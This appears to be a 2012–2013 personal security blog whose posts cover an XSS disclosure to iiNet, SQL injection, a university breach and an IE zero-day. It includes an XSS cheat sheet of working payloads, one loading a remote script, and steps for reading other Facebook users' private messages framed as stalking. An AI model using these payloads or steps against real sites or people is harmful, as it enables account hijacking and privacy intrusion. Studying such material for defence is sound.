Monday, 11 March 2013

"Douchebag" iiNet - Reported XSS, No response.

In September 2012, I decided to responsibly disclose a few serious iiNet vulnerabilities. I firmly believe that responsible disclosure is a MUST in this industry if we want to move towards a more secure web experience for everyone.

Toying around with a few vectors on their toolbox led me to a GET-based XSS as well as HTML injection. After finding this, I decided to call iiNet and see what they had to say. Of course, I got pushed around from department to department, simply for being a good Samaritan on the internet.
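
For illustration only (the actual iiNet endpoint is withheld), a reflected GET XSS boils down to a query parameter being echoed into the page without encoding, along these lines:

http://example.com/toolbox/lookup?q=<script>alert(document.cookie)</script>

If that q parameter is written into the response unescaped, the script executes in the victim's browser under the site's origin, which is what makes a crafted link like this so dangerous.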

Eventually, I reached a dead end and was advised to send an email to webmaster@iinet.net.au. Doing so, I fully disclosed the vulnerability, its effects, and possible prevention methods. It took them over 3 months to fix it. Want to know what's worse? They didn't even reply.

Yes. I am talking about iiNet, considered a "good" ISP due to their "responsive" customer service. This certainly wasn't the case for me.

If you run a website or web service and a penetration tester is willing to discuss their findings, take the opportunity. Chances are they are just trying to help, and if they are not asking for anything in return, consider them a person of decent moral standing.

The XSS vulnerabilities on iiNet are NOW fixed, but no reply has ever been issued to me, not even a simple two-word response: "Thank you".

Note: For those who wish to get any sort of proof or even perhaps a more detailed discussion about this personally, feel free to contact me.

Wednesday, 17 October 2012

Security Flaws: Why are they ignored?

Nobody likes to feel vulnerable. So why do security flaws get so readily ignored by developers and administrators? This debate rages on in the security community (and probably will for a long time to come).

I personally believe there are a number of correct answers, depending on the situation. At the end of the day, the outcome will be the same unless this attitude changes, but shedding some light on the reasons behind wilful ignorance of bugs and security flaws will hopefully encourage you, the reader, to take a closer look at yourself and see if you can change the way you look at bugs. So, without further ado, here are a few of the key reasons that security gets disregarded.

1. Pride

Most large infrastructure and web projects take incredible amounts of time and dedication to design, develop, debug, and deploy. A successful project should indeed be considered a source of pride for all those who were involved in it, but especially the people who brought it to what it is today, from square one.

When we consider this, it's understandable that a developer or administrator may feel embarrassed, threatened, or even insulted if somebody points out flaws in one of their creations.

This is evident in common reactions to researchers reporting vulnerabilities in software and infrastructure. More often than not, security researchers are ignored at best, and at worst sometimes even face legal action, purely for trying to do the right thing with their knowledge.

2. Self-Preservation

My second big reason is self-preservation. I hate to have to say this, but not everybody in this world is looking out for the greater good, and that's just the stark reality. While some people will ignore security holes for the sake of their own pride (which is self-preservation in a sense), I still rank this as a separate class because it is selfish on a different level.

The software engineering industry is incredibly competitive in nature and the unskilled quickly fall to the bottom of the pecking order. In order to survive in such a hostile job market, you must stay on the cutting edge of your development area, or at least appear to be doing so.

Some developers will simply refuse to acknowledge a flaw in their code for fear of losing their job or being held accountable in some other way. They are willing to take a gamble with the risk for the sake of their own short-term job security.

Naturally, this approach can result in catastrophic damage to a company and its reputation. We need only look at Sony in the recent LulzSec attacks to see how much damage can be done to a company's reputation in a matter of minutes as a result of sloppy security.

3. Lack of Understanding

Information security is such a vast and rapidly expanding topic in today's digital society that it is impossible for the average person to keep up with what is occurring in the security world on a regular basis. Flaws are found and exploited faster than any one person can track. Vulnerabilities pointed out in the early 2000s are still being actively exploited today and continue to appear in newly developed applications.

This environment is simply part of security research, and the cat-and-mouse game is never going to change. However, good security practices and adequate testing are the key to risk-minimisation in the IT world. Unfortunately, many developers simply don't understand the risks associated with leaving applications unchecked for security flaws, or don't possess the understanding to fix these problems, and so choose to ignore them.
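
To make this concrete, here is the kind of decade-old flaw that still turns up in new code. This is a hedged sketch in the style of a mysql-like Node.js driver; the table and variable names are purely illustrative:

// Vulnerable: attacker-controlled input is concatenated straight into the SQL.
// A username of  ' OR '1'='1  returns every row in the table.
connection.query("SELECT * FROM users WHERE name = '" + username + "'", callback);

// Safer: a parameterised query keeps data separate from query structure,
// so the input can never rewrite the meaning of the SQL.
connection.query("SELECT * FROM users WHERE name = ?", [username], callback);

The fix has been common knowledge since the early 2000s, which is exactly the point: ignoring it is a choice, not an inevitability.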

This lack of understanding can prove just as dangerous to a company's reputation and infrastructure as the other two reasons already mentioned. Often, people with this mindset will be extremely quick to seek help or fix their projects after an attack, but sometimes it's just too late. When a database full of credit-card details is stolen or corporate secrets are exfiltrated from a company server, the damage cannot easily be undone.

4. Laziness

Let's face it: almost nobody likes having to do extra work, especially if they don't see it as important or see the time as better spent elsewhere. I think this one is pretty straightforward and self-explanatory; no need for more than one paragraph. The bottom line is, it needs to be done, simple as that. Either fix it yourself or get someone else to do it for you. Laziness is never an excuse and usually leads to a slippery slope of failure.

Developers and administrators of important systems need to do the mature thing and take ownership of their oversights and mistakes. Trying to hide them, or to shift the blame onto an innocent researcher who is attempting to help, is not helpful or productive in any way. The more these attitudes persist, the more security researchers will be pushed into the criminal world, where their skills are welcomed with open arms and, sadly but ironically, with considerably less risk of legal complications.

The "bug bounty" programs of companies such as Google, Facebook, and Paypal are a step forward in the future of security research and I hope to see similar programs implemented across a wider variety of companies soon. Who knows? Perhaps some day soon the "Bug Reporting Policy" will be as common to find in e-businesses as the "Privacy Policy" and "Contact Us" page. One can only hope...

Saturday, 29 September 2012

Facebook Privacy Breach: Private messages exposed!

Well, well, well... looks like they've done it again. Facebook has created yet another serious privacy concern for its users, and it appears to be accidental, not deliberate like others (Check-In, I'm looking at you).

This time, the private messages of Facebook users have been exposed to their friends, and possibly the world, as a result of a bug in the new Timeline system. Thanks to this programming glitch, private messages, juicy conversations, and potentially sensitive data are just a few clicks away from anyone who may wish to access them. Below are the easy steps to try this for yourself:

1. Go to your stalking target's timeline.
2. Select 2010 from the date list down the right of the page.
3. Look for the section of their page headed: "14 friends posted on [Target]'s timeline."
4. The "wall posts" in this list are actually private messages; the replies to them are the conversation.


No doubt, this will result in some very bad press for Facebook and heads will be rolling within the development team. I wouldn't even be particularly surprised to see legal action being taken against the social media giant given the potential for leakage of private information. I can already see celebrity gossip stemming from this very glitch.

All in all, this is just another nail in the coffin for individual privacy on the internet. How could such a glitchy piece of code be shipped by such a large corporation? Damned if I know, but one thing's for sure: it definitely isn't going to end well for Mark Zuckerberg or his clients.

Monday, 24 September 2012

University of Technology Hacked? Update: UTS Breach, Users notified.

This weekend I decided to pay a visit to zone-h.org, the website where hackers present their "defacements" of hacked websites. Going through the list, it was apparent that most of the hacked websites weren't big targets, just general unsecured sites riddled with vulnerabilities. However, after going through some pages, I found this:

[Screenshot: the zone-h listing of the UTS defacement]
The University of Technology, Sydney's servers seem to have been breached on 2012-09-22 at 01:10:38. That was only two days ago.

The server which was defaced was: http://datasearch.uts.edu.au

Looking at it now, all I see is a blank page with a single word, "Datasearch". It seems almost as if UTS has covered their tracks.

Analysing the hackers' message, it seems this was a targeted hack, based on the text written: "Dear, Ugliest Tower In Sydney. Hire some staff who actually know what they are doing. BTW, I just RM -RFd you bitches. That should teach you a lesson."
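
For those unfamiliar with the reference, rm -rf is the Unix command that recursively (-r) and forcibly (-f) deletes a directory tree; the claim is that the attackers wiped data off the server. A hypothetical example (the path is purely illustrative):

rm -rf /var/www    # delete everything under /var/www, no confirmation asked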


Now here comes the scary bit. These hackers have not only breached the servers, but they have also released the majority of some sort of staff or user database.

Going further down the defacement, we can see the details of approximately 757 people, all from UTS or linked to it in some way. These include usernames, passwords, emails and the works. If almost one thousand people from a well-known Australian university were breached, then why the heck has this not been reported, or dealt with appropriately?

I have respect for universities, but this is wrong! If a breach were to occur due to sloppy coding on our end, the first thing I would do is report the breach to those affected IMMEDIATELY.

Even though the data dates back to 2002, you would be surprised how many people still use the same passwords. Even worse, these passwords are all in plain text. How convenient for the hackers.
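
Plain text is never defensible. As a minimal sketch of the alternative, assuming a Node.js backend (the function and its parameters are illustrative, not UTS's actual code):

var crypto = require('crypto');

// Store a random salt plus a slow PBKDF2 hash, never the raw password.
function hashPassword(password) {
    var salt = crypto.randomBytes(16).toString('hex');
    var hash = crypto.pbkdf2Sync(password, salt, 10000, 64, 'sha512').toString('hex');
    return salt + ':' + hash; // persist this pair instead of the password
}

Even if a database dump like this one leaks, the attackers then face an expensive brute-force per password instead of a free win.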

UTS, I don't know who you hire for your web security, or your network security in general, but given the recent hacks on popular Australian universities (the University of Sydney and UNSW), and considering you pride yourselves on being a technology-focused university, this is the wrong way to go.

As of yet, it seems this hasn't been blogged about anywhere, and I find it quite appalling that a breach can happen without those affected knowing about it.

You would think people would be getting more secure as the days go by, but honestly, it seems that either a) people lack the knowledge to secure themselves, or b) hackers are excelling at breaking through that security.

That's all for now,
Shubham

Update: Many people have written articles on this -
http://www.smh.com.au/it-pro/security-it/hackers-breach-deface-uts-website-20120925-26i4j.html#ixzz27TM6GAw6
http://www.zdnet.com/au/hackers-deface-old-uts-system-dump-user-database-7000004694/

They state that they detected the breach and that it was an old server. Still scary news, though.

Tuesday, 18 September 2012

Another 0day in the wild. This time Internet Explorer.

Just recently, the internet experienced a Java exploit in the wild. Now, from the same creators, a new 0day has been found, this time affecting Internet Explorer as a whole. Unlike the Java exploit, which targeted a product constantly known for its crappy security, this time malware engineers have targeted Internet Explorer, and have been successful.

What I find extremely stupid is that Eric Romang (http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/) was able to find this 0day located on the SAME server as the previous Java 0day. Personally, I think this exploit was not created by the people running that server, but was rather distributed, or sold for a very high price, through Russian blackmarket channels such as antichat.

A simple diagram explains the simplicity of this vulnerability:

[Diagram omitted; source: http://labs.alienvault.com]

Microsoft suggests blocking ActiveX controls for now and awaiting the newest Internet Explorer 10, which supposedly fixes this issue. If one were smart, however, one would not be using Internet Explorer at all ;)

Other than that, from my observations, this exploit has gone to total waste! Such an exploit could be sold on the blackmarkets for up to $20k a pop, meaning the author must be absolutely devastated right now.

Why would it cost so much, you ask? Think about it. As an example, take Russian monetisers who use malware as their main platform. The process would be exceedingly simple and profitable for them: firstly, buy this exploit; secondly, load their malware onto it; thirdly, buy traffic originating from developing countries such as India, Pakistan and Vietnam, where users are more likely to run Internet Explorer. With a constant traffic flow from their usual sources, they could hit a 60-70% infection rate at scale.

Let us calculate this. Say 100k visitors were sent; even a conservative 50% infection rate yields 50k infected machines, so the monetisers would have gained a 50k botnet in about a week. With those 50k machines they could mine bitcoins or simply rent out their slaves as SOCKS5 proxies. The money in this runs into the thousands.
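
As a back-of-the-envelope sketch (every figure here is an assumption from the paragraph above, not measured data):

var visitors = 100000;               // bought traffic
var infectionRate = 0.5;             // conservative vs. the 60-70% cited earlier
var bots = visitors * infectionRate; // 50,000 infected machines
console.log(bots + ' bots in roughly a week');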

Anyway, enough of my rambling. It was an absolutely great find, and it is unbelievable that the exploit was located on already-blacklisted servers (how stupid is that?). Stay safe, and be smart: simply don't use Internet Explorer.

P.S. For a very in-depth, full analysis of the code, I suggest you visit http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/, which takes a much more programmatic approach to this 0day. Also, a Metasploit module has already been created for this vulnerability.

Saturday, 15 September 2012

XSS Cheat Sheet! Including HTML5 Vectors.

HTML5 Vectors -

Vectors by Gareth Heyes
Some vectors also from HTML5Sec
Regular Vectors from RSnake

HTML5 Web Applications
<input autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<select autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<textarea autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<keygen autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
  -------------------------------------------------------------
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  -------------------------------------------------------------
<video onerror="javascript:alert(1)"><source></source></video>
  -------------------------------------------------------------
<form><button formaction="javascript:alert(1)">X</button>
  -------------------------------------------------------------
<body oninput=alert(1)><input autofocus>
  -------------------------------------------------------------
<frameset onload=alert(1)>
 
HTML Web Applications
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  -------------------------------------------------------------
'';!--"<XSS>=&{()}
  -------------------------------------------------------------
<SCRIPT>alert('XSS')</SCRIPT>
  -------------------------------------------------------------
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  -------------------------------------------------------------
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  -------------------------------------------------------------
<BASE HREF="javascript:alert('XSS');//">
  -------------------------------------------------------------
<BGSOUND SRC="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY BACKGROUND="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY ONLOAD=alert('XSS')>
 
The fuzzdb project includes hundreds more XSS vectors.

Robots.txt files, and why they matter!

Believe it or not, one important factor in web security goes largely unacknowledged. The robots.txt file is used by the majority of webmasters to disallow the indexing of sensitive files. The problem with this is that anyone has access to your robots file, so you MUST make sure that nothing important gets disclosed through it.

Many servers hold a file called "robots.txt" in their root directory to dictate to search engines what is allowed to be indexed, cached, and listed in search results. Furthermore, these can be paired with sitemaps to specify the URLs that search engines should index.

Now, there's one big flaw in this. Suppose we had a webmaster called Joe, and he didn't want search engines to index a private directory called "privatedirectory". He'd proceed to list it in his robots.txt file like this:

User-agent: *
Disallow: /privatedirectory

Have you spotted the flaw? It's bluntly obvious! Anyone can visit the robots.txt file of any given server at any given time, and doing so discloses the very directory Joe wished to keep hidden.

How do you make a proper robots.txt file? Use sitemaps! Don't list any private or sensitive directories directly in the robots file, and where possible use the Allow method rather than the Disallow method shown above, as in the sketch below.
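
A minimal sketch of the Allow approach (the directory names are illustrative): deny everything by default and whitelist only the public paths, so private directory names never appear in the file at all.

User-agent: *
Allow: /blog/
Allow: /images/
Disallow: /

Note that Allow is an extension honoured by the major search engines rather than part of the original robots.txt standard, but for this purpose it does the job.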

Personally, back in 2009, I was talking to a few blackhats on IRC and asked them: what is potentially the stupidest thing that has helped you get through layers of security? They told me that they were pentesting an ISP and had found an SQL injection that led to the disclosure of admin passwords, but were stuck at that point. They had no idea where the admin directory was and had tried all sorts of methods to find it. In the end, they realised the answer was sitting in plain text in the robots file, which disallowed the indexing of a directory called "/a1d2m3i4n5". This is quite shocking, as not only should an ISP never have SQLi in the first place, but it should also NEVER place such sensitive directories in the robots file.

This concludes my ramble on the robots file. I hope it helps you in whatever position you are in.